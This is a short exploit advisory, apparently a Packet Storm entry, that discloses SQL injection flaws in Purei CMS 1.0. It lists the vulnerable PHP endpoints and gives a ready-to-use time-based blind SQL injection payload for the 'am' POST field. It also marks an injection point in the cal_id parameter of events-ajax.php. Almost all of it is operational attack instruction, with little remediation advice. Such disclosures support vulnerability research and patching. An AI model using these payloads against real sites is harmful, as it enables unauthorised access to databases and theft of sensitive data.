Share
## https://sploitus.com/exploit?id=PACKETSTORM:177822
# Exploit Title: Purei CMS 1.0 - SQL Injection  
# Date: [27-03-2024]  
# Exploit Author: [Number 7]  
# Vendor Homepage: [purei.com]  
# Version: [1.0]  
# Tested on: [Linux]  
____________________________________________________________________________________  
  
Introduction:  
An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation   
of user input. Such an injection transpires when web applications accept user input directly inserted   
into an SQL statement without effectively filtering out hazardous characters.  
  
This could jeopardize the integrity of your database or reveal sensitive information.  
____________________________________________________________________________________  
  
Time-Based Blind SQL Injection:  
Vulnerable files:  
http://localhost/includes/getAllParks.php  
http://localhost/includes/getSearchMap.php  
  
make a POST request with the value of the am input set to :   
  
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/   
  
make sure to url encode the inputs.   
SQL injection:  
Method: POST REQUEST  
  
Vunerable file:  
  
/includes/events-ajax.php?action=getMonth  
data for the POST req:  
month=3&type=&year=2024&cal_id=1[Inject Here]